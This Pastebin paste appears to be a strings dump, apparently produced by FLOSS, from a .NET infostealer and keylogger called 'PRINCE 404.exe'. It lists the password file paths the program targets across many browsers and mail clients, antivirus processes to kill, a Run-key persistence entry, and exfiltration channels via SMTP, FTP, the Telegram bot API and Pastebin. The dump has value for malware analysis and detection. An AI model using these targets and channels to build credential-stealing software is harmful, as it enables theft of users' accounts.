Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- BSJB
- v4.0.30319
- #Strings
- #GUID
- #Blob
- R V f k
- Microsoft.VisualBasic
- ApplicationBase
- Microsoft.VisualBasic.ApplicationServices
- Computer
- Microsoft.VisualBasic.Devices
- mscorlib
- Object
- System
- User
- Type
- System.Windows.Forms
- Timer
- Process
- System.Diagnostics
- EventArgs
- Keys
- List`1
- System.Collections.Generic
- Enum
- ValueType
- MulticastDelegate
- IAsyncResult
- AsyncCallback
- StringBuilder
- System.Text
- EditorBrowsableAttribute
- System.ComponentModel
- EditorBrowsableState
- GeneratedCodeAttribute
- System.CodeDom.Compiler
- DebuggerHiddenAttribute
- StandardModuleAttribute
- Microsoft.VisualBasic.CompilerServices
- HideModuleNameAttribute
- HelpKeywordAttribute
- System.ComponentModel.Design
- RuntimeHelpers
- System.Runtime.CompilerServices
- RuntimeTypeHandle
- Activator
- MyGroupCollectionAttribute
- ComVisibleAttribute
- System.Runtime.InteropServices
- ThreadStaticAttribute
- CompilerGeneratedAttribute
- Operators
- ServerComputer
- Conversions
- FileSystemProxy
- Microsoft.VisualBasic.MyServices
- SpecialDirectoriesProxy
- Path
- System.IO
- Random
- Int32
- String
- Strings
- CompareMethod
- Math
- EventHandler
- ComputerInfo
- Double
- WebClient
- System.Net
- Stream
- IWebProxy
- StreamReader
- Exception
- WebHeaderCollection
- WebRequest
- CredentialCache
- NetworkCredential
- ICredentials
- ProjectData
- ClipboardProxy
- FtpWebRequest
- StreamWriter
- Attachment
- System.Net.Mail
- MailMessage
- SmtpClient
- TextWriter
- Encoding
- NewLateBinding
- File
- IDisposable
- MailAddress
- MailAddressCollection
- Environment
- AttachmentCollection
- Collection`1
- System.Collections.ObjectModel
- ICredentialsByHost
- Directory
- System.Drawing
- Graphics
- Bitmap
- Size
- Rectangle
- Point
- Screen
- Image
- DirectoryInfo
- DateTime
- Int64
- NameValueCollection
- System.Collections.Specialized
- MemoryStream
- GZipStream
- System.IO.Compression
- CompressionMode
- Byte
- Boolean
- Assembly
- System.Reflection
- Application
- RegistryKey
- Microsoft.Win32
- Registry
- RegistryValueKind
- Interaction
- MsgBoxResult
- MsgBoxStyle
- WebResponse
- Keyboard
- AccessedThroughPropertyAttribute
- STAThreadAttribute
- MarshalAsAttribute
- UnmanagedType
- InAttribute
- Delegate
- Module
- Marshal
- IntPtr
- SpecialFolder
- HttpWebRequest
- HttpWebResponse
- Enumerator
- UTF8Encoding
- Convert
- IEnumerable`1
- Buffer
- Array
- System.Security
- ProtectedData
- System.Security.Cryptography
- DataProtectionScope
- FileStream
- FileMode
- Char
- System.Xml
- XmlDocument
- XmlNodeList
- XmlNode
- XmlElement
- IEnumerator
- System.Collections
- IEnumerable
- GCHandle
- GCHandleType
- ICryptoTransform
- MD5CryptoServiceProvider
- TripleDESCryptoServiceProvider
- HashAlgorithm
- SymmetricAlgorithm
- CipherMode
- PaddingMode
- TripleDES
- DllImportAttribute
- FlagsAttribute
- StructLayoutAttribute
- LayoutKind
- BitConverter
- Decimal
- Utils
- UInt64
- FileSystem
- OpenMode
- OpenAccess
- OpenShare
- System.Web.Extensions
- JavaScriptSerializer
- System.Web.Script.Serialization
- UnmanagedFunctionPointerAttribute
- CallingConvention
- CompilationRelaxationsAttribute
- RuntimeCompatibilityAttribute
- .ctor
- get_GetInstance
- GetObjectValue
- Equals
- GetHashCode
- GetTypeFromHandle
- ToString
- CreateInstance
- m_ThreadStaticValue
- ConcatenateObject
- get_Name
- GetProcesses
- get_FileSystem
- get_SpecialDirectories
- get_MyDocuments
- Combine
- Next
- Concat
- Split
- ToDouble
- Round
- Append
- remove_Tick
- add_Tick
- get_Info
- get_OSFullName
- get_OSVersion
- get_OSPlatform
- get_TotalPhysicalMemory
- Format
- get_Headers
- GetSystemWebProxy
- get_DefaultNetworkCredentials
- set_Credentials
- set_Proxy
- OpenRead
- SetProjectError
- ClearProjectError
- ReadToEnd
- Close
- Replace
- get_Clipboard
- GetText
- Contains
- AddObject
- CompareString
- WriteLine
- get_UTF8
- GetBytes
- LateGet
- set_Method
- ReadAllBytes
- set_ContentLength
- GetRequestStream
- Write
- Delete
- Dispose
- set_From
- get_To
- get_UserName
- set_Subject
- set_Body
- get_Attachments
- set_EnableSsl
- ToInteger
- set_Port
- Send
- Exists
- CreateProjectError
- set_Interval
- get_Screen
- get_Bounds
- get_Width
- get_Height
- FromImage
- CopyFromScreen
- Save
- CreateDirectory
- get_Now
- get_Ticks
- get_Encoding
- GetString
- UploadData
- Exit
- UploadValues
- LateCall
- ChangeType
- GetExecutingAssembly
- GetManifestResourceStream
- get_Length
- Read
- Start
- get_ProcessName
- LCase
- Kill
- GetProcessesByName
- GetCurrentProcess
- get_ExecutablePath
- Left
- GetTempPath
- get_Millisecond
- CurrentUser
- OpenSubKey
- SetValue
- MsgBox
- Create
- GetResponse
- InStr
- Substring
- get_Keyboard
- get_ShiftKeyDown
- get_CapsLock
- Remove
- GetModules
- GetHINSTANCE
- ToInt32
- Finalize
- GetFolderPath
- GetResponseStream
- get_Count
- GetEnumerator
- get_Current
- MoveNext
- GetSubKeyNames
- GetValue
- ToChar
- BlockCopy
- Unprotect
- LocalMachine
- LastIndexOf
- GetDirectories
- ChrW
- Copy
- SubtractObject
- get_Default
- LateSetComplex
- Environ
- Load
- GetElementsByTagName
- get_ItemOf
- get_InnerText
- StrReverse
- FromBase64String
- get_ASCII
- Alloc
- AddrOfPinnedObject
- Free
- get_Chars
- ToLower
- Initialize
- ComputeHash
- set_Mode
- set_Padding
- set_Key
- set_IV
- CreateDecryptor
- TransformFinalBlock
- get_Unicode
- CompareObjectEqual
- CompareObjectGreater
- OrObject
- ToBoolean
- ConditionalCompareObjectEqual
- ToInt64
- Subtract
- ToUInt16
- CopyArray
- Compare
- ToULong
- get_BigEndianUnicode
- Multiply
- ToUInt64
- ToLong
- CompareTo
- IndexOf
- LTrim
- ConditionalCompareObjectGreater
- FileOpen
- Space
- FileGet
- FileClose
- Zero
- GetFiles
- Deserialize
- GetDelegateForFunctionPointer
- GetEnvironmentVariable
- AllocHGlobal
- op_Inequality
- FreeHGlobal
- PRINCE 404.exe
- <Module>
- MyApplication
- MyComputer
- MyProject
- m_ComputerObjectProvider
- m_AppObjectProvider
- m_UserObjectProvider
- m_MyWebServicesObjectProvider
- .cctor
- get_Computer
- get_Application
- get_User
- get_WebServices
- WebServices
- MyWebServices
- GetType
- Create__Instance__
- instance
- Dispose__Instance__
- ThreadSafeObjectProvider`1
- GetInstance
- GClass0
- infooeoe
- _myTimer
- _TIIMMER
- _scrti
- _loloa
- _kebrd
- _rzzzzr
- string_0
- string_1
- THETHE
- FTPEP
- TELLE
- TOTO
- FOFO
- SUSU
- POPO
- PTPT
- USEUSE
- ESUESU
- URLEL
- TheID
- thetoken
- loccle
- path22
- path23
- path24
- PASSWORD
- StolsClip
- login_url
- post_url
- dev_key
- user_name
- user_password
- user_key
- result
- strin
- kkkkkbssssss
- _HKB
- strinjj
- enct
- input
- get_myTimer
- set_myTimer
- value
- get_TIIMMER
- set_TIIMMER
- get_scrti
- set_scrti
- get_loloa
- set_loloa
- get_kebrd
- set_kebrd
- get_rzzzzr
- set_rzzzzr
- smethod_0
- smethod_1
- smethod_2
- smethod_3
- smethod_4
- smethod_5
- sender
- oewepe
- kkkAss
- SCRIN
- UploadMultipart
- file
- filename
- contentType
- Login
- Post
- paste_code
- paste_name
- paste_format
- DecompressGZip
- bytesToDecompress
- LQXYGZYYRI
- KJKWCCYACS
- Main
- smethod_6
- killle
- smethod_7
- smethod_8
- GetModuleFileNameA
- kernel32
- hModule
- lpFileName
- nSize
- ExitProcess
- uExitCode
- MoveFileExW
- lpExistingFileName
- lpNewFileName
- dwdvsdfdbdtyd
- smethod_9
- AddToStartup
- name
- path
- Sendit
- kkkA
- telegramsender
- tokennns
- urrid
- GetAsyncKeyState
- user32
- vKey
- GetKeyState
- nVirtKey
- smethod_10
- GetShift
- smethod_11
- smethod_12
- kkkAssaa
- get_HKB
- set_HKB
- GetForegroundWindow
- user32.dll
- GetWindowTextA
- hwnd
- lpString
- GAWT
- shiftandcaps
- myTimer
- TIIMMER
- scrti
- loloa
- kebrd
- rzzzzr
- Class0
- cPass
- opera_salt
- key_size
- pathsss
- DOutput
- Opass
- encryptedData
- pHash
- smethod_13
- smethod_14
- smethod_15
- smethod_16
- smethod_17
- smethod_18
- smethod_19
- smethod_20
- smethod_21
- smethod_22
- smethod_23
- smethod_24
- smethod_25
- smethod_26
- smethod_27
- smethod_28
- smethod_29
- smethod_30
- smethod_31
- smethod_32
- CryptUnprotectData
- Crypt32.dll
- pDataIn
- szDataDescr
- pOptionalEntropy
- pvReserved
- pPromptStruct
- dwFlags
- pDataOut
- smethod_33
- Datas
- smethod_34
- smethod_35
- encrypt_data
- GClass1
- db_bytes
- page_size
- encoding
- master_table_entries
- SQLDataTypeSize
- table_entries
- field_names
- startIndex
- endIndex
- IsOdd
- method_0
- ReadMasterTable
- Offset
- method_1
- ReadTable
- TableName
- GetRowCount
- row_num
- field
- GetTableNames
- baseName
- GClass2
- Class3
- NSS3
- hModuleList
- LoadLibrary
- kernel32.dll
- dllFilePath
- GetProcAddress
- procName
- CreateAPI
- method
- NSS_Shutdown
- FreeLibrary
- NSS_Inite
- configdir
- Decrypt
- cypherText
- data
- GClass3
- _Url
- _Username
- _Password
- get_Url
- set_Url
- get_Username
- set_Username
- get_Password
- set_Password
- Username
- Password
- kjdshfi23ur9fjsdfmiowuf9sods
- HC_ACTION
- WH_KEYBOARD_LL
- WM_KEYDOWN
- WM_KEYUP
- WM_SYSKEYDOWN
- WM_SYSKEYUP
- KDEvent
- KUEvent
- SetWindowsHookExA
- idHook
- lpfn
- hmod
- dwThreadId
- CallNextHookEx
- hHook
- nCode
- wParam
- lParam
- UnhookWindowsHookEx
- add_KD
- remove_KD
- add_KU
- remove_KU
- KeyboardProcwew
- Class1
- _appName
- _username
- _password
- _URL
- set_UserName
- get_URL
- set_URL
- get_appName
- set_appName
- UserName
- appName
- CryptProtectPromptFlags
- value__
- CRYPTPROTECT_PROMPT_ON_UNPROTECT
- CRYPTPROTECT_PROMPT_ON_PROTECT
- CRYPTPROTECT_PROMPTSTRUCT
- cbSize
- dwPromptFlags
- hwndApp
- szPrompt
- DATA_BLOB
- cbData
- pbData
- record_header_field
- size
- type
- table_entry
- row_id
- content
- sqlite_master_entry
- item_type
- item_name
- astable_name
- root_num
- sql_statement
- FFLogins
- _nextId
- _logins
- _disabledHosts
- _version
- get_nextId
- set_nextId
- get_logins
- set_logins
- get_disabledHosts
- set_disabledHosts
- get_version
- set_version
- nextId
- logins
- disabledHosts
- version
- Class2
- _hostname
- _url
- _httprealm
- _formSubmitURL
- _usernameField
- _passwordField
- _encryptedUsername
- _encryptedPassword
- _guid
- _encType
- _timeCreated
- _timeLastUsed
- _timePasswordChanged
- _timesUsed
- get_id
- set_id
- get_hostname
- set_hostname
- get_url
- set_url
- get_httprealm
- set_httprealm
- get_formSubmitURL
- set_formSubmitURL
- get_usernameField
- set_usernameField
- get_passwordField
- set_passwordField
- get_encryptedUsername
- set_encryptedUsername
- get_encryptedPassword
- set_encryptedPassword
- get_guid
- set_guid
- get_encType
- set_encType
- get_timeCreated
- set_timeCreated
- get_timeLastUsed
- set_timeLastUsed
- get_timePasswordChanged
- set_timePasswordChanged
- get_timesUsed
- set_timesUsed
- hostname
- httprealm
- formSubmitURL
- usernameField
- passwordField
- encryptedUsername
- encryptedPassword
- guid
- encType
- timeCreated
- timeLastUsed
- timePasswordChanged
- timesUsed
- DLLFunctionDelegate6
- TargetObject
- TargetMethod
- BeginInvoke
- DelegateCallback
- DelegateAsyncState
- EndInvoke
- DelegateAsyncResult
- Invoke
- DLLFunctionDelegate
- DLLFunctionDelegate4
- arenaOpt
- outItemOpt
- inStr
- inLen
- DLLFunctionDelegate5
- TSECItem
- SECItemType
- SECItemData
- SECItemLen
- sadfgbui32yur89usjdf8934rtf
- sdicyhsjcjsdnc
- scancode
- flags
- time
- dwExtraInfo
- KeyboardProcDelegateee
- KDEventHandler
- KUEventHandler
- PRINCE 404
- ^1b1
- b1[1^1V1
- "C7+D
- MyTemplate
- 14.0.0.0
- My.Application
- My.User
- My.Computer
- My.WebServices
- 4System.Web.Services.Protocols.SoapHttpClientProtocol
- Create__Instance__
- Dispose__Instance__
- rzzzzr
- kebrd
- loloa
- scrti
- TIIMMER
- myTimer
- WrapNonExceptionThrows
- _CorExeMain
- mscoree.dll
- <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
- <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
- <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
- <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
- <security>
- <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
- <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
- </requestedPrivileges>
- </security>
- </trustInfo>
- </assembly>
- FLOSS static UTF-16 strings
- Persistence'False
- ------- + INFO + -------
- IP:
- Owner Name:
- OS Name:
- OS Version:
- OS PlatForm:
- RAM Size:
- -------------------------
- False
- shushu
- TRUSSTS
- contact@frankella.com
- smtp.privateemail.com
- <redacted>
- Results.txt
- Clipboardlog.txt
- Leyboardlogs.txt
- {0:f2} GB
- user-agent
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
- http://checkip.dyndns.org/
- <html><head><title>Current IP Check</title></head><body>
- </body></html>
- Current IP Address:
- http
- <http>
- True
- .txt
- |------- Results - Clipboard Logs -------|
- ---------------------------------------------
- Create
- Clipboard -
- STOR
- Clipboard Logs | Client Name:
- Tretzhh
- Clipboard Logs | Client Name:
- |------- Results - Clipboard Logs -------|
- Screenshot
- .png
- \404k
- \404k\
- Screenshot -
- Screenshot | Client Name:
- |------ Results - Screenshot ------|
- ------------------------
- Content-Type
- multipart/form-data; boundary=
- --{0}
- Content-Disposition: form-data; name="document"; filename="{1}"
- Content-Type: {2}
- --{0}--
- POST
- api_dev_key
- api_user_name
- api_user_password
- https://pastebin.com/api/api_login.php
- Bad API request
- api_user_key
- api_option
- paste
- api_paste_code
- api_paste_name
- api_paste_format
- api_paste_private
- api_paste_expire_date
- https://pastebin.com/api/api_post.php
- Read
- Write
- ToArray
- MSGtype12
- chrome
- zlclient
- egui
- bdagent
- npfmsg
- olydbg
- anubis
- wireshark
- avastui
- _Avp32
- vsmon
- mbam
- keyscrambler
- _Avpcc
- _Avpm
- Ackwin32
- Outpost
- Anti-Trojan
- ANTIVIR
- Apvxdwin
- ATRACK
- Autodown
- Avconsol
- Ave32
- Avgctrl
- Avkserv
- Avnt
- Avp32
- Avpcc
- Avpdos32
- Avpm
- Avptc32
- Avpupd
- Avsched32
- AVSYNMGR
- Avwin95
- Avwupd32
- Blackd
- Blackice
- Cfiadmin
- Cfiaudit
- Cfinet
- Cfinet32
- Claw95
- Claw95cf
- Cleaner
- Cleaner3
- Defwatch
- Dvp95
- Dvp95_0
- Ecengine
- Esafe
- Espwatch
- F-Agnt95
- Findviru
- Fprot
- F-Prot
- F-Prot95
- Fp-Win
- F-Stopw
- Iamapp
- Iamserv
- Ibmasn
- Ibmavsp
- Icload95
- Icloadnt
- Icmon
- Icsupp95
- Icsuppnt
- Iface
- Iomon98
- Jedi
- Lockdown2000
- Lookout
- Luall
- MCAFEE
- Moolive
- Mpftray
- N32scanw
- NAVAPSVC
- NAVAPW32
- NAVLU32
- Navnt
- NAVRUNR
- Navw32
- Navwnt
- NeoWatch
- NISSERV
- Nisum
- Nmain
- Normist
- NORTON
- Nupgrade
- Nvc95
- Padmin
- Pavcl
- Pavsched
- Pavw
- PCCIOMON
- PCCMAIN
- Pccwin98
- Pcfwallicon
- Persfw
- POP3TRAP
- PVIEW95
- Rav7
- Rav7win
- Rescue
- Safeweb
- Scan32
- Scan95
- Scanpm
- Scrscan
- Serv95
- SMCSERVICE
- Snort
- Sphinx
- Sweep95
- SYMPROXYSVC
- Tbscan
- Tds2-98
- Tds2-Nt
- TermiNET
- Vet95
- Vettray
- Vscan40
- Vsecomr
- Vshwin32
- Vsstat
- Webscanx
- WEBTRAP
- Wfindv32
- Zonealarm
- LOCKDOWN2000
- RESCUE32
- LUCOMSERVER
- avgcc
- avgamsvr
- avgupsvc
- avgw
- avgcc32
- avgserv
- avgserv9
- avgserv9schedapp
- avgemc
- ashwebsv
- ashdisp
- ashmaisv
- ashserv
- aswUpdSv
- symwsc
- norton
- Norton Auto-Protect
- norton_av
- nortonav
- ccsetmgr
- ccevtmgr
- avadmin
- avcenter
- avgnt
- avguard
- avnotify
- avscan
- guardgui
- nod32krn
- nod32kui
- clamscan
- clamTray
- clamWin
- freshclam
- oladdin
- sigtool
- w9xpopen
- Wclose
- cmgrdian
- alogserv
- mcshield
- vshwin32
- avconsol
- vsstat
- avsynmgr
- avcmd
- avconfig
- licmgr
- sched
- preupd
- MsMpEng
- MSASCui
- Avira.Systray
- \tmpG
- .tmp
- software\microsoft\windows\currentversion\run
- |------- Results - Passwords -------|
- ---------------------------------------------
- Results -
- PSWD | Client Name:
- Vavaa
- ---------------------------------------------
- Results
- PSWD | Client Name:
- |------- Results - Passwords -------|
- https://api.telegram.org/bot
- /sendMessage?chat_id=
- &text=
- |------- Results - Keyboard Logs -------|
- Keyboard -
- Keyboard Logs | Client Name:
- |------- Results - Keyboard Logs -------|
- [BACK]
- [F1]
- [F2]
- [F3]
- [F4]
- [F5]
- [F6]
- [F7]
- [F8]
- [F9]
- [F10]
- [F11]
- [F12]
- [TAB]
- [END]
- [ESC]
- https://myip.dnsomatic.com
- ==== + Outlook + ====
- URL:
- Email:
- Password:
- =============================
- IMAP Password
- POP3 Password
- HTTP Password
- SMTP Password
- Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
- Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Email
- GetBytes
- SMTP Server
- Nothing
- Outlook
- SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command
- Foxmail.exe
- Storage\
- \Accounts\Account.rec0
- Account
- POP3Account
- Password
- POP3Password
- ==== + Foxmail + ====
- E-Mail: {0}
- Password: {0}
- \Google\Chrome\User Data\Default\Login Data
- ReadTable
- logins
- GetRowCount
- GetValue
- origin_url
- username_value
- password_value
- ==== + Google Chrome + ====
- Host:
- Username:
- AppData
- \.purple\accounts.xml
- protocol
- name
- password
- ===== + Pidgin + =====
- Protocol:
- \Liebao7\User Data\Default\EncryptedStorage
- entries
- str3
- str2
- blob0
- ===== + Liebao + =====
- Host:
- \AVAST Software\Browser\User Data\Default\Login Data
- snigol
- lru_nigiro
- eulav_emanresu
- eulav_drowssap
- ===== + Avast + =====
- Host:
- \Tencent\QQBrowser\User Data\Default\Login Data
- ==== + QQ Browser + ====
- Host:
- \Orbitum\User Data\Default\Login Data
- ==== + Orbitum Browser + ====
- Host:
- \CocCoc\Browser\User Data\Default\Login Data
- ==== + Coc Coc Browser + ====
- Host:
- \Slimjet\User Data\Default\Login Data
- ==== + Slimjet Browser + ====
- Host:
- \Iridium\User Data\Default\Login Data
- ==== + Iridium Browser + ====
- Host:
- \Vivaldi\User Data\Default\Login Data
- ==== + Vivaldi Browser + ====
- Host:
- \Chromium\User Data\Default\Login Data
- ==== + Iron Browser + ====
- Host:
- ==== + Chromium Browser + ====
- Host:
- \GhostBrowser\User Data\Default\Login Data
- ==== + Ghost Browser + ====
- Host:
- \CentBrowser\User Data\Default\Login Data
- ==== + Cent Browser + ====
- Host:
- \Xvast\User Data\Default\Login Data
- ==== + Xvast Browser + ====
- Host:
- \Chedot\User Data\Default\Login Data
- ==== + Chedot + ====
- Host:
- \SuperBird\User Data\Default\Login Data
- ==== + SuperBird Browser + ====
- Host:
- \360Browser\Browser\User Data\Default\Login Data
- ==== + 360 Browser + ====
- Host:
- \360Chrome\Chrome\User Data\Default\Login Data
- \Comodo\Dragon\User Data\Default\Login Data
- ==== + Comodo Dragon + ====
- Host:
- \BraveSoftware\Brave-Browser\User Data\Default\Login Data
- ==== + Brave Browser + ====
- Host:
- \Torch\User Data\Default\Login Data
- ==== + Torch Browser + =====
- Host:
- \UCBrowser\User Data_i18n\Default\UC Login Data.18
- wow_logins
- ==== + UC Browser + =====
- Host:
- \Blisk\User Data\Default\Login Data
- ==== + Blisk Browser + =====
- Host:
- \Epic Privacy Browser\User Data\Default\Login Data
- ==== + Epic Browser + =====
- Host:
- ataD nigoL\elbatS arepO\erawtfoS arepO\
- tad.dnaw\eliforp\arepO\arepO\
- ==== + Opera Browser + ====
- Host:
- APPDATA
- \FileZilla\recentservers.xml
- Host
- User
- Pass
- Port
- ===== + FileZilla + =====
- Host:
- Username:
- Password:
- Port:
- abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
- IndexOf
- Substring
- UNIQUE
- table
- Mozilla\Firefox\Profiles
- logins.json
- ===== + FireFox + =====
- Host:
- =============================
- Thunderbird\Profiles\
- ===== + Thunderbird + =====
- Host:
- Mozilla\SeaMonkey\Profiles
- ===== + SeaMonkey + =====
- Host:
- Comodo\IceDragon\Profiles
- ===== + Comodo IceDeagon + =====
- Host:
- 8pecxstudios\Cyberfox\Profiles
- ===== + Cyber Fox + =====
- Host:
- Moonchild Productions\Pale Moon\Profiles
- ===== + Pale Moon + =====
- Host:
- NSS_Shutdown
- PROGRAMFILES
- \Mozilla Thunderbird\
- \Mozilla Firefox\
- \SeaMonkey\
- \Comodo\IceDragon\
- \Cyberfox\
- \Pale Moon\
- \mozglue.dll
- \nss3.dll
- NSS_Init
- https://pastebin.com/api/api_login.php
- https://pastebin.com/api/api_post.php
- VS_VERSION_INFO
- VarFileInfo
- Translation
- StringFileInfo
- 000004b0
- FileDescription
- FileVersion
- 0.0.0.0
- InternalName
- PRINCE 404.exe
- LegalCopyright
- OriginalFilename
- PRINCE 404.exe
- ProductVersion
- 0.0.0.0
- Assembly Version
- 0.0.0.0
Add Comment
Please, Sign In to add comment